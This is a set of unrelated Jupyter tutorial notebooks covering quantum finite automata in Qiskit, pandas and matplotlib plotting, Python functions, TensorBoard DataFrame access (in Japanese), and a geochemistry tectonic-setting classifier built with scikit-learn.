Classically, this algorithm requires a minimum of $ log(p) $ bits to store the information, whereas the quantum algorithm only requires $ log(log(p)) $ qubits. For example, using the highest known prime integer, the classical algorithm requires **a minimum of 77,232,917 bits**, whereas the quantum algorithm **only requires 27 qubits**. ## Introduction <a id='introduction'></a> The algorithm in this notebook follows that in [Ambainis et al. 1998](https://arxiv.org/pdf/quant-ph/9802062.pdf). We assume that we are given a string and a prime integer. If the user does not input a prime number, the output will be a ValueError. First, we demonstrate a simpler version of the quantum algorithm that uses $ log(p) $ qubits to store the information. Then, we can use this to more easily understand the quantum algorithm that requires only $ log(log(p)) $ qubits. ## The Algorithm for Log(p) Qubits The algorithm is quite simple as follows. 1. Prepare quantum and classical registers for $ log(p) $ qubits initialized to zero. $$ |0\ldots 0\rangle $$ 2. Prepare $ log(p) $ random numbers k in the range {$ 1 $... $ p-1 $}. These numbers will be used to decrease the probability of a string getting accepted when $ p $ does not divide $ i $. 3. Perform $ i $ Y-Rotations on each qubit, where $ \theta $ is initially zero and $ \Phi $ is the angle of rotation for each unitary. $$ \Phi = \frac{2 \pi k}{p} $$ 4. In the final state: $$ \cos \theta |0\rangle + \sin \theta |1\rangle $$ $$ \theta = \frac{2 \pi k i}{p} $$ 5. Measure each of the qubits in the classical register. If $ p $ divides $ i $, $ \cos \theta $ will be one for every qubit and the state will collapse to $ |0\rangle $ to demonstrate an accept state with a probability of one. Otherwise, the output will consist of a small probability of accepting the string into the language and a higher probability of rejecting the string.
## The Circuit <a id="circuit"></a> We now implement the QFA Prime Divisibility algorithm with QISKit by first preparing the environment. ``` # useful additional packages import random import math from sympy.ntheory import isprime # importing QISKit from qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister from qiskit import Aer, IBMQ, execute from qiskit.wrapper.jupyter import * from qiskit.backends.ibmq import least_busy from qiskit.tools.visualization import matplotlib_circuit_drawer as circuit_drawer from qiskit.tools.visualization import plot_histogram, qx_color_scheme IBMQ.load_accounts() sim_backend = Aer.get_backend('qasm_simulator') device_backend = least_busy(IBMQ.backends(operational=True, simulator=False)) device_coupling = device_backend.configuration()['coupling_map'] ``` We then use QISKit to program the algorithm. ``` #Function that takes in a prime number and a string of letters and returns a quantum circuit def qfa_algorithm(string, prime): if isprime(prime) == False: raise ValueError("This number is not a prime") #Raises a ValueError if the input prime number is not prime else: n = math.ceil((math.log(prime))) #Rounds up to the next integer of the log(prime) qr = QuantumRegister(n) #Creates a quantum register of length log(prime) for log(prime) qubits cr = ClassicalRegister(n) #Creates a classical register for measurement qfaCircuit = QuantumCircuit(qr, cr) #Defining the circuit to take in the values of qr and cr for x in range(n): #For each qubit, we want to apply a series of unitary operations with a random int random_value = random.randint(1,prime - 1) #Generates the random int for each qubit from {1, prime -1} for letter in string: #For each letter in the string, we want to apply the same unitary operation to each qubit qfaCircuit.ry((2*math.pi*random_value) / prime, qr[x]) #Applies the Y-Rotation to each qubit qfaCircuit.measure(qr[x], cr[x]) #Measures each qubit return qfaCircuit #Returns the created quantum circuit ``` The 
qfa_algorithm function returns the Quantum Circuit qfaCircuit. ## Experiment with Simulators We can run the above circuit on the simulator. ```
#A function that returns a string saying if the string is accepted into the language or rejected
def accept(parameter):
    """Return an accept/reject message for the measured counts of circuit `parameter`.

    NOTE(review): this reads the module-level `result` set by the calling cell
    (it is not passed in); `parameter` is only used as the key into the counts.
    If any observed bitstring contains a "1", the string is rejected.
    """
    states = list(result.get_counts(parameter))
    for s in states:
        for integer in s:
            if integer == "1":
                return "Reject: the string is not accepted into the language"
    return "Accept: the string is accepted into the language"
``` Insert your own parameters and try even larger prime numbers. ``` range_lower = 0 range_higher = 36 prime_number = 11 for length in range(range_lower,range_higher): params = qfa_algorithm("a"* length, prime_number) job = execute(params, sim_backend, shots=1000) result = job.result() print(accept(params), "\n", "Length:",length," " ,result.get_counts(params)) ``` ### Drawing the circuit of the QFA Below is the snapshop of the QFA for reading the bitstring of length $3$. It can be seen that there are independent QFAs each of which performs $Y$ rotation for $3$ times. ``` circuit_drawer(qfa_algorithm("a"* 3, prime_number), style=qx_color_scheme()) ``` ## The Algorithm for Log(Log(p)) Qubits The algorithm is quite simple as follows. 1. Prepare a quantum register for $ log(log(p)) + 1 $ qubits initialized to zero. The $ log(log(p))$ qubits will act as your control bits and the 1 extra will act as your target bit. Also prepare a classical register for 1 bit to measure the target. $$ |0\ldots 0\rangle |0\rangle $$ 2. Hadamard the control bits to put them in a superposition so that we can perform multiple QFA's at the same time. 3. For each of $s $ states in the superposition, we can perform an individual QFA with the control qubits acting as the random integer $ k $ from the previous algorithm. Thus, we need $ n $ values from $ 1... log(p)$ for $ k $. 
For each letter $ i $ in the string, we perform a controlled y-rotation on the target qubit, where $ \theta $ is initially zero and $ \Phi $ is the angle of rotation for each unitary. $$ \Phi = \frac{2 \pi k_{s}}{p} $$ 4. The target qubit in the final state: $$ \cos \theta |0\rangle + \sin \theta |1\rangle $$ $$ \theta = \sum_{s=0}^n \frac{2 \pi k_{s}} p {i} $$ 5. Measure the target qubit in the classical register. If $ i $ divides $ p $, $ \cos \theta $ will be one for every QFA and the state of the target will collapse to $ |0\rangle $ to demonstrate an accept state with a probability of one. Otherwise, the output will consist of a small probability of accepting the string into the language and a higher probability of rejecting the string. ## The Circuit <a id="circuit"></a> We then use QISKit to program the algorithm. ```
#Function that takes in a prime number and a string of letters and returns a quantum circuit
def qfa_controlled_algorithm(string, prime):
    """Build the log(log(p))-control-qubit QFA circuit for divisibility of len(string) by prime.

    n = ceil(log2(log2(prime))) control qubits are put into superposition with
    Hadamards so that 2**n QFAs run at once; for each letter, a controlled-u3
    (Y) rotation of 2*pi*(2**q)/prime is applied from each control qubit q onto
    the single target qubit qr[n]. Only the target qubit is measured, into the
    1-bit classical register.

    Raises:
        ValueError: if `prime` is not a prime number.
    """
    if isprime(prime) == False:
        raise ValueError("This number is not a prime") #Raises a ValueError if the input prime number is not prime
    else:
        n = math.ceil((math.log(math.log(prime,2),2))) #Represents log(log(p)) control qubits
        states = 2 ** (n) #Number of states that the qubits can represent/Number of QFA's to be performed
        qr = QuantumRegister(n+1) #Creates a quantum register of log(log(prime)) control qubits + 1 target qubit
        cr = ClassicalRegister(1) #Creates a 1-bit classical register used to measure the target qubit
        control_qfaCircuit = QuantumCircuit(qr, cr) #Defining the circuit to take in the values of qr and cr
        for q in range(n): #We want to take each control qubit and put them in a superposition by applying a Hadamard Gate
            control_qfaCircuit.h(qr[q])
        for letter in string: #For each letter in the string, we want to apply a series of Controlled Y-rotations
            for q in range(n):
                control_qfaCircuit.cu3(2*math.pi*(2**q)/prime, 0, 0, qr[q], qr[n]) #Controlled Y on Target qubit 
        control_qfaCircuit.measure(qr[n], cr[0]) #Measure the target qubit
        return control_qfaCircuit #Returns the created quantum circuit
``` The qfa_controlled_algorithm function returns the Quantum Circuit control_qfaCircuit. ## Experiment with Simulators We can run the above circuit on the simulator. ``` for length in range(range_lower,range_higher): params = qfa_controlled_algorithm("a"* length, prime_number) job = execute(params, sim_backend, shots=1000) result = job.result() print(accept(params), "\n", "Length:",length," " ,result.get_counts(params)) ``` ### Drawing the circuit of the QFA Below is the snapshot of the QFA for reading the bitstring of length $3$. It can be seen that there is a superposition of QFAs instead of independent QFAs. ``` circuit_drawer(qfa_controlled_algorithm("a"* 3, prime_number), style=qx_color_scheme()) ``` ## Experimenting with Real Devices Real-device backends have errors and if the above QFAs are executed on the noisy backends, errors in rejecting strings that should have been accepted can happen. Let us see how well the real-device backends can realize the QFAs. Let us look at an example where the QFA should reject the bitstring because the length of the bitstring is not divisible by the prime number. ``` prime_number = 3 length = 2 # set the length so that it is not divisible by the prime_number print("The length of a is", length, " while the prime number is", prime_number) qfa1 = qfa_controlled_algorithm("a"* length, prime_number) %%qiskit_job_status HTMLProgressBar() job = execute(qfa1, backend=device_backend, coupling_map=device_coupling, shots=100) result = job.result() plot_histogram(result.get_counts()) ``` In the above, we can see that the probability of observing "1" is quite significant. Let us see what the circuit looks like. ``` circuit_drawer(qfa1, style=qx_color_scheme()) ``` Now, let us see what happens when the QFAs should accept the input string. 
``` print_number = length = 3 # set the length so that it is divisible by the prime_number print("The length of a is", length, " while the prime number is", prime_number) qfa2 = qfa_controlled_algorithm("a"* length, prime_number) %%qiskit_job_status HTMLProgressBar() job = execute(qfa2, backend=device_backend, coupling_map=device_coupling, shots=100) result = job.result() plot_histogram(result.get_counts()) ``` The error of rejecting the bitstring is equal to the probability of observing "1", which can be checked from the above histogram. We can see that the noise of real-device backends prevents us from having a correct answer. It is left as future work to mitigate errors of the backends in the QFA models. ``` circuit_drawer(qfa2, style=qx_color_scheme()) ```
github_jupyter
<a href="https://colab.research.google.com/github/gumdropsteve/intro_to_python/blob/main/day_08/00_intro_to_python_visualizations.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # Visualization in Python Matplotlib with Pandas [.plot()](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.plot.html) ``` import pandas as pd # pd.read_parquet('https://github.com/gumdropsteve/datasets/blob/master/nyc_taxi/yellow_tripdata_2019-12.parquet?raw=true') df = pd.read_parquet('https://github.com/gumdropsteve/datasets/blob/master/nyc_taxi/yellow_tripdata_2019-12.parquet?raw=true') df.plot('passenger_count', 'trip_distance') df.tail() df.plot(kind='scatter', x='passenger_count', y='trip_distance') df.plot(kind='scatter', y='passenger_count', x='trip_distance') # df.plot(kind='scatter', x='tpep_pickup_datetime', y='passenger_count') # df.plot(kind='pie', y='payment_type') import pandas as pd df = pd.read_csv('https://github.com/gumdropsteve/datasets/raw/master/iris.csv') df ``` ### pandas .plot() is great but we start getting issues ``` # df.plot(kind='pie', y='species') df.plot(kind='pie', y='target') ``` ## It's time to import matplotlib How do they do it? ``` import matplotlib.pyplot as plt # Pie chart, where the slices will be ordered and plotted counter-clockwise: labels = 'Frogs', 'Hogs', 'Dogs', 'Logs' sizes = [15, 30, 45, 10] explode = (0, 0.1, 0, 0) # only "explode" the 2nd slice (i.e. 'Hogs') fig1, ax1 = plt.subplots() ax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90) ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle. plt.show() ``` #### How do we apply that to our situation? 
``` df['species'].unique() df['species'].value_counts() fig1, ax1 = plt.subplots() labels = [i for i in df['species'].unique()] sizes = [i for i in df['species'].value_counts()] fig1, ax1 = plt.subplots() ax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90) labels = [i for i in df['species'].unique()] sizes = [i for i in df['species'].value_counts()] fig1, ax1 = plt.subplots() ax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90) plt.show() ``` #### Can't copy? Try saving! https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.pyplot.savefig.html ``` labels = [i for i in df['species'].unique()] sizes = [i for i in df['species'].value_counts()] fig1, ax1 = plt.subplots() ax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90) plt.savefig('test.png') from PIL import Image Image.open('test.png') ```
github_jupyter
<font size="+5">#01 | The Use of Functions</font> <div class="alert alert-warning"> <ul> <li> <b>Python</b> + <b>Data Science</b> Tutorials in ↓ <ul> <li> <a href="https://www.youtube.com/c/PythonResolver?sub_confirmation=1" >YouTube</a > </li> <li> <a href="https://blog.pythonresolver.com/">Blog</a> </li> <li> <a href="https://github.com/jsulopz/00-python-resolver-discipline">GitHub</a> </li> </ul> </li> <li> Author: <a href="https://twitter.com/jsulopz"><b>@jsulopz</b></a> </li> </ul> </div> # The Challenge <div class="alert alert-danger"> Load the following <strong>Excel</strong> file... </div> ![](src/excel.png) # The Covered Solution <div class="alert alert-success"> ...into <strong>Python ↓</strong> </div> ``` ?? # read the full story to find out the solution ``` # What will we learn? - Why the `function()` is so important in programming? - Which ways do you have to access **different types of `functions()`**? - How to find **solutions by filtering tutorials on Google**? - How to **get help from python** and use it wisely? # Which concepts will we use? - Module ~ Library - Dot notation - Objects - Variables ~ Instance - The Autocompletion Tool - The Docstring - Function - `object.function()` - `module.function()` - `built_in_function()` - [Google Method] # Requirements? - None # The starting *thing* ``` internet_usage_spain.xlsx ``` # Syllabus for the [Notebook](01script_functions.ipynb) 1. Default *things* in Python 2. Object-Oriented Programming 1. `string` 2. `integer` 3. `float` 4. `list` 1. The Python Resolver Discipline 2. Type of `functions()` 1. `Built-in` Functions 2. Functions inside `instances` 3. External Functions: from the `module` 1. Use of `functions()` 1. Change Default Parameters of a Function 2. The Elements of Programming 1. Code Syntax 1. The `module` 2. The `.` **DOT NOTATION** 3. The `function()` 4. The `(parameter=object)` 1. `(io='internet_usage_spain.xlsx')` 2. `(sheet_name=1)` 1. When you `execute`... 2. 
The `function()` returns an `object` 3. Recap 1. Source Code Execution | What happens <ins>inside</ins> the computer ? 2. The Importance of the `function()` 1. Python doesn't know about the Excel File 2. Other `functions()` 1. What have we learnt? 1. Why the `function()` is so important in programming? 2. Why have you got **different types of `functions()`**? 3. How to find **solutions by filtering tutorials on Google**? 4. How to **get help from python** and use it wisely? 1. Define the concepts ↓ # The Uncovered Solution 1. `module` - <font color="red">pandas</font> 2. `.` **DOT NOTATION** to look for *functions* inside the `module` or `instance` 3. `function()` - read_excel <font color="red">pandas</font> 4. pass `objects` to the `parameters` - pass `str ("internet_usage_spain.xlsx")` to `parameter (io=?)` - pass `int (1)` to `parameter (sheet_name=?)` 5. execute 6. [ ] magic? 7. the `function()` returns an `object` ``` import pandas as pd pd.read_excel(io='internet_usage_spain.xlsx', sheet_name=1) ```
github_jupyter
##### Copyright 2020 The TensorFlow Authors. ``` #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ``` # TensorBoard の DataFrames データにアクセスする ## 概要 TensorBoard の主な機能はインタラクティブ GUI ですが、ログデータの事後分析やカスタム視覚化の作成目的で、TensorBoard に保存されているデータログを **プログラムで** 読み取るユーザーもいます。 TensorBoard 2.3 は、`tensorboard.data.experimental.ExperimentFromDev()` でこのようなユースケースをサポートしており、TensorBoard の[スカラーログ](https://www.tensorflow.org/tensorboard/scalars_and_keras)にプログラムを使ってアクセスすることができます。このページでは、この新しい API の基本的な使用方法を実演します。 > **注意:** > > 1. この API は、名前空間で想像できるように、まだ実験段階にある API です。そのため、将来的に重大な変更が適用される場合があります。 > 2. 現在のところ、この機能は TensorBoard.dev にアップロードされる logdir のみをサポートしています。TensorBoard.dev は、TensorBoard の永続化と共有を可能にする無料のホステッドサービスです。ローカルに保存されている TensorBoard logdir のサポートは、今後追加される予定です。簡単に言うと、ローカルのファイルシステムに保存されている TensorBoard logdir を、1 行のコマンド(`tensorboard dev upload --logdir <logdir>`)で TensorBoard.dev にアップロードすることができます。詳細は、[tensorboard.dev](https://tensorboard.dev) をご覧ください。 ## セットアップ プログラマティック API を使用するには、`tensorboard` とともに `pandas` がインストールされていることを確認してください。 このガイドではカスタムプロットの作成に `matplotlib` と `seaborn` を使用しますが、任意のツールを使って `DataFrame` の分析と視覚化を行えます。 ``` !pip install tensorboard pandas !pip install matplotlib seaborn from packaging import version import pandas as pd from matplotlib import pyplot as plt import seaborn as sns from scipy import stats import tensorboard as tb major_ver, minor_ver, _ = version.parse(tb.__version__).release assert major_ver >= 2 and minor_ver >= 3, \ "This notebook requires TensorBoard 2.3 or later." 
print("TensorBoard version: ", tb.__version__) ``` ## `pandas.DataFrame` として TensorBoard スカラーを読み込む TensorBoard logdir が TensorBoard.dev にアップロードされると、logdir は「*実験*」となります。各実験には一意の ID が割り当てられており、実験の TensorBoard.dev URL で確認することができます。次のデモでは、https://tensorboard.dev/experiment/c1KCv3X3QvGwaXfgX1c4tg にある TensorBoard.dev を使用しています。 ``` experiment_id = "c1KCv3X3QvGwaXfgX1c4tg" experiment = tb.data.experimental.ExperimentFromDev(experiment_id) df = experiment.get_scalars() df ``` `df` は、実験のすべてのスカラーログを含む [`pandas.DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) です。 `DataFrame` の列は次のとおりです。 - `run`: run(実行)は、元の logdir のサブディレクトリに対応しています。この実験では、run は特定のオプティマイザタイプ(トレーニングハイパーパラメータ)を使用した MNIST データセットのニューラルネットワーク(CNN)の完全なトレーニングに由来しています。この `DataFrame` は、このような run が複数含まれており、別のオプティマイザタイプの配下にある反復トレーニングに対応しています。 - `tag`: これは、同一の行にある `value` の意味、つまり値が表現するメトリックが何であるかを記述しています。この実験では、`epoch_accuracy` と `epoch_loss` という、それぞれ精度と損失のメトリックに対応する 2 つのタグのみがあります。 - `step`: これは、run の中で対応する行のシリアル順を反映する番号です。ここでは、`step` は実際にエポック番号を指します。`step` 値とは別にタイムスタンプを取得する場合は、`get_scalars()` を呼び出す際にキーワード引数 `include_wall_time=True` を使用できます。 - `value`: これは関心のある実際の数値です。上述のとおり、この特定の `DataFrame` の各 `value` は、行の `tag` に応じて損失か精度になります。 ``` print(df["run"].unique()) print(df["tag"].unique()) ``` ## ピボット(ワイドフォーム)DataFrame を取得する この実験では、各実行の同じステップ時に 2 つのタグ(`epoch_loss` と `epoch_accuracy`)が存在します。このため、`pivot=True` キーワード引数を使用することで、「ワイドフォーム」`DataFrame` を `get_scalars()` から直接取得することができます。すべてのタグがワイドフォーム `DataFrame` の列として含まれているため、このケースを含み、場合によっては操作がより便利になります。 ただし、すべての実行のすべてのタグで統一したステップ値を持つ条件が満たされない場合、`pivot=True` を使用するとエラーになることに注意してください。 ``` dfw = experiment.get_scalars(pivot=True) dfw ``` ワイドフォーム DataFrame には、1 つの「value」列の代わりに、`epoch_accuracy` と `epoch_loss` の 2 つのタグ(メトリック)が列として明示的に含まれています。 ## DataFrame を CSV として保存する `pandas.DataFrame` has good interoperability with [CSV](https://en.wikipedia.org/wiki/Comma-separated_values). You can store it as a local CSV file and load it back later. 
For example: ``` csv_path = '/tmp/tb_experiment_1.csv' dfw.to_csv(csv_path, index=False) dfw_roundtrip = pd.read_csv(csv_path) pd.testing.assert_frame_equal(dfw_roundtrip, dfw) ``` ## カスタム視覚化と統計分析を実行する ``` # Filter the DataFrame to only validation data, which is what the subsequent # analyses and visualization will be focused on. dfw_validation = dfw[dfw.run.str.endswith("/validation")] # Get the optimizer value for each row of the validation DataFrame. optimizer_validation = dfw_validation.run.apply(lambda run: run.split(",")[0]) plt.figure(figsize=(16, 6)) plt.subplot(1, 2, 1) sns.lineplot(data=dfw_validation, x="step", y="epoch_accuracy", hue=optimizer_validation).set_title("accuracy") plt.subplot(1, 2, 2) sns.lineplot(data=dfw_validation, x="step", y="epoch_loss", hue=optimizer_validation).set_title("loss") ``` 上記のプロットは、検証精度と検証損失のタイムコースを示し、それぞれの曲線は、あるオプティマイザタイプによる 5 回の実行の平均を示します。`seaborn.lineplot()` に組み込まれた機能により、それぞれの曲線は、平均に関する ±1 の標準偏差も表示するため、曲線の変動性と 3 つのオプティマイザの差の重要性がわかりやすくなります。この変動性の視覚化は、TensorBoard の GUI ではまだサポートされていません。 最小検証損失が「adam」、「rmsprop」、および「sgd」オプティマイザ間で大きく異なるという仮説を調べるため、それぞれのオプティマイザにおける最小検証損失の DataFrame を抽出します。 そして、最小検証損失の差を視覚化する箱ひげ図を作成します。 ``` adam_min_val_loss = dfw_validation.loc[optimizer_validation=="adam", :].groupby( "run", as_index=False).agg({"epoch_loss": "min"}) rmsprop_min_val_loss = dfw_validation.loc[optimizer_validation=="rmsprop", :].groupby( "run", as_index=False).agg({"epoch_loss": "min"}) sgd_min_val_loss = dfw_validation.loc[optimizer_validation=="sgd", :].groupby( "run", as_index=False).agg({"epoch_loss": "min"}) min_val_loss = pd.concat([adam_min_val_loss, rmsprop_min_val_loss, sgd_min_val_loss]) sns.boxplot(data=min_val_loss, y="epoch_loss", x=min_val_loss.run.apply(lambda run: run.split(",")[0])) # Perform pairwise comparisons between the minimum validation losses # from the three optimizers. 
_, p_adam_vs_rmsprop = stats.ttest_ind( adam_min_val_loss["epoch_loss"], rmsprop_min_val_loss["epoch_loss"]) _, p_adam_vs_sgd = stats.ttest_ind( adam_min_val_loss["epoch_loss"], sgd_min_val_loss["epoch_loss"]) _, p_rmsprop_vs_sgd = stats.ttest_ind( rmsprop_min_val_loss["epoch_loss"], sgd_min_val_loss["epoch_loss"]) print("adam vs. rmsprop: p = %.4f" % p_adam_vs_rmsprop) print("adam vs. sgd: p = %.4f" % p_adam_vs_sgd) print("rmsprop vs. sgd: p = %.4f" % p_rmsprop_vs_sgd) ``` したがって、分析では、重要度レベル 0.05 で、最小検証損失が、実験に含まれるほかの 2 つのオプティマイザよりも rmsprop オプティマイザの方が大幅に高い(つまり悪化する)という仮説が実証されます。 まとめると、このチュートリアルでは、 TensorBoard.dev から `panda.DataFrame` のスカラーデータにアクセスする例を示しました。`DataFrame` を使用して行える柔軟で強力な分析と視覚化を実演しました。
github_jupyter
# Geochem for Machine Learning: Preprocessing and a Simple Classification Example In this notebook we'll provide a simple example of preprocessing some geochemical data for use in a classification workflow. We'll also look at how this contrasts with more traditional methods of classification within geochemistry, and how programmatic workflows and tools can not only make this more robust, but also more reproducible. This exercise is adapted somewhat from earlier examples of the first author, here with a slightly different focus. The principal role of `pyrolite` in this example is for getting data in shape such that it's ready to be input into a machine learning workflow/pipeline (largely facilitated by [`scikit-learn`](https://scikit-learn.org/)), but we can also examine how a data-driven programmatic approach provides a number of advantages over other traditional methods - including reproducibility. ## Traditional Classification Methods in Geochemistry In geochemistry, classification is for historical reasons often treated as a graphical or two-dimensional problem for which the output includes a graphically-represented classification or discrimination diagram (driven by a need to visualize the data; e.g. [Pearce, 1973]; [Le Bas et al. 1992] ). And while many of these diagrams have been practically useful for 'binning' and describing rocks, the divisions we use don't necessarily make sense in the natural world (e.g. consider the Total Alkali - Silica diagram). Modern statistical and machine learning techniques can readily be applied to make better use of the data dimensionality and move beyond the human-centric limitations. In this case a data driven approach instead considers divisions according to the natural clustering of data, where they exist. ## Towards Multivariate Machine Classification Below we'll demonstrate a machine learning approach to classifying basalt geochemistry based on tectonic setting. 
We'll adapt a version of a support vector classifier, similar to those previously used for this problem ([Petrelli, 2016]; [Ueki, 2018]), and re-use the same 29-dimension tectonic discrimination dataset (just over 2000 samples taken from global repositories, each with majors, minors, traces and isotopes) from Ueki et al. (2018), modified to record the tectonic setting of each basalt in a 'Class' column. First let's examine a well-used trace element discrimination diagram (the Th-Nb-Yb diagram; [Pearce, 2008]) to get some insight what some of the key issues with classification using only a few elements or dimension. This is one of number of classification and tectonic diagrams have been developed which use specific geochemical proxies to link rock and mineral geochemistry to geological processes and reservoirs (here Nb/Yb and Th/Yb which distinguish relative enrichment of the mantle and arc-related processes). As the diagram presents only two dimensions (or three, depending who you talk to), the data presented show only part of the whole picture. This reduced dimensionality means that when you compare rocks from a variety of settings, you're likely to see large degrees of overlap, as found by [Li et al. (2015)], and shown below. While the diagram is not particularly useful as a classification tool, the proxies used (ratios or otherwise) still provide useful 'features' which can be added to datasets before constructing a multivariate classifier. | <img src="https://github.com/morganjwilliams/gs2020-diggingdeeper/raw/develop/img/Smithies2018Fig1.png" style="display:inline; margin: 0px 15px 15px 0px;" width="70%"/>|<img src="https://github.com/morganjwilliams/gs2020-diggingdeeper/raw/develop/img/Li2015Fig9.png" style="display:inline; margin: 0px 15px 15px 0px;" width="70%"/> | |--|--| | Figure from [Smithies (2018)] illustrating the main features of the Th-Yb-Nb diagram [Pearce (2008)], including the mantle or 'MORB-OIB array' and the 'modern arc array'. 
| Figure from [Li et al. (2015)], illustrating the significant degree of overlap in these two dimensions between different tectonic settings renders this approach futile for generalized discrimination. | <!--(BAB: Back Arc Basin, CA: Continental Arc, CFB: Continental Flood Basalt, IA: Island Arc, IOA: Intra-oceanic Arc, MOR: Mid-Ocean Ridge, OI: Ocean Island, OP: Oceanic Plateau) --> [Pearce, 1973]: https://doi.org/10.1016/0012-821X(73)90129-5 "Pearce, J.A., Cann, J.R., 1973. Tectonic setting of basic volcanic rocks determined using trace element analyses. Earth and Planetary Science Letters 19, 290–300. doi: 10.1016/0012-821X(73)90129-5" [Li et al. (2015)]: https://doi.org/10.1016/j.lithos.2015.06.022 "Li, C., Arndt, N.T., Tang, Q., Ripley, E.M., 2015. Trace element indiscrimination diagrams. Lithos 232, 76–83. " [Le Bas et al. 1992]: https://doi.org/10.1007/BF01160698 "Le Bas M. J., Le Maitre R. W. and Woolley A. R., 1992. The construction of the Total Alkali-Silica chemical classification of volcanic rocks. Mineral. Petrol. 46, 1–22." [Smithies (2018)]: https://doi.org/10.1016/j.epsl.2018.01.034 "Smithies, R.H., Ivanic, T.J., Lowrey, J.R., Morris, P.A., Barnes, S.J., Wyche, S., Lu, Y.-J., 2018. Two distinct origins for Archean greenstone belts. Earth and Planetary Science Letters 487, 106–116." [Pearce (2008)]: https://doi.org/10.1016/j.lithos.2007.06.016 "Pearce, J.A., 2008. Geochemical fingerprinting of oceanic basalts with applications to ophiolite classification and the search for Archean oceanic crust. Lithos 100, 14–48." [Pearce, 2008]: https://doi.org/10.1016/j.lithos.2007.06.016 "Pearce, J.A., 2008. Geochemical fingerprinting of oceanic basalts with applications to ophiolite classification and the search for Archean oceanic crust. Lithos 100, 14–48." [Petrelli, 2016]: https://doi.org/10.1007/s00410-016-1292-2 "Petrelli, M., Perugini, D., 2016. 
Solving petrological problems through machine learning: the study case of tectonic discrimination using geochemical and isotopic data. Contrib Mineral Petrol 171, 81." [Ueki, 2018]: https://doi.org/10.1029/2017GC007401 "Ueki, K., Hino, H., Kuwatani, T., 2018. Geochemical Discrimination and Characteristics of Magmatic Tectonic Settings: A Machine-Learning-Based Approach. Geochemistry, Geophysics, Geosystems 19, 1327–1347." ## Dataset and Preprocessing Here we go through a few simple preprocessing steps to get the dataset ready for input into our pipeline. For more on preprocessing (especially if you don't start from a nice data table like this one), [see the first example notebook on 'munging'](./01_munging.ipynb) ``` import pandas as pd import numpy as np import pyrolite.geochem from util import get_onedrive_directlink ueki_2018_dataset_url = get_onedrive_directlink("https://1drv.ms/u/s!As2ibEui13xmkqQLTMPI4hn4ACEc_w?e=cmcqU8") df = pd.read_csv(ueki_2018_dataset_url) df.head() df.columns ``` First we, can make sure that our different tectonic settings are represented in a readable way. 
Here we change `Cluster_ID` to contain an abbrevaition of the class name (BAB: Back Arc Basin, CA: Continental Arc, CFB: Continental Flood Basalt, IA: Island Arc, IOA: Intra-oceanic Arc, MOR: Mid-Ocean Ridge, OI: Ocean Island, OP: Oceanic Plateau): ``` classes = ["CA", "IA", "IOA", "BAB", "CFB", "MOR", "OP", "OI"] class_converter = {ix + 1: classes[ix] for ix in range(len(classes))} df["Cluster_ID"] = df["Cluster_ID"].apply(lambda x: class_converter[x]) df.pyrochem.add_ratio("Th/Yb") df.pyrochem.add_ratio("Nb/Yb"); df.head() compositional_variables = df.pyrochem.list_compositional abundances = [i for i in df.columns if i in compositional_variables] isotopes = [i for i in df.columns if i not in ["Cluster_ID", 'Number'] and i not in compositional_variables] classes = list(df.Cluster_ID.unique()) ``` ## A Simple Classifier For sake of illustration, we can build a simple classifier here and see what the minimum steps required to have a working model look like: ``` from sklearn.preprocessing import StandardScaler from sklearn.model_selection import train_test_split from sklearn.svm import SVC from sklearn.pipeline import make_pipeline from sklearn import set_config set_config(display='diagram') ``` First we need to decide what we wish to predict - in this case we want to predict the `Cluster_ID` using the element and oxide abundances together with the isotope ratios: ``` X, y = df.loc[:, abundances + isotopes], df["Cluster_ID"] ``` From this we can create some independent training and test sets so we can more accurately asses the performance of the model we're about to create and make sure our model is more generalisable: ``` X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y, test_size=0.3) ``` Rather than use the data as-is, we should first scale it so that it's within the range which our classifier model is optimised for (typically -1 to 1 or so). 
Here we can use a standard scaler which normalises each of our variables to their respective mean and standard deviations. We can combine this with a classifier model and construct a pipeline. Here we've used a support vector classifier model (SVC), which should deal with our relatively limited dataset more readily than more complex models might: ``` svc_pipeline = make_pipeline(StandardScaler(), SVC()) svc_pipeline ``` We can now fit our simple classifer model, with the training data: ``` svc_pipeline.fit(X_train, y_train); ``` We can quickly check how well this classifier performs overall by seeing what percentage of our testing data it accurately classifies: ``` svcscore = svc_pipeline.score(X_test, y_test) "Overall Accuracy: {:.1f}%".format(svcscore*100) ``` That's not bad for a few lines of code and a fairly small dataset! ## Adding Some Detail We can improve on this simple model by adding in a few extra steps, parameters and details. Here we create a probabilistic equivalent of our SVC model, and independently process our abudnance and isotopic data to account for their naturally non-normal distributions. Additionally, we build a number of different models and choose the best of the bunch. First we'll build a pipeline, then put this within a grid search cross-validation optimizer which will search across a grid of specified parameter ranges to find a more optimal model. 
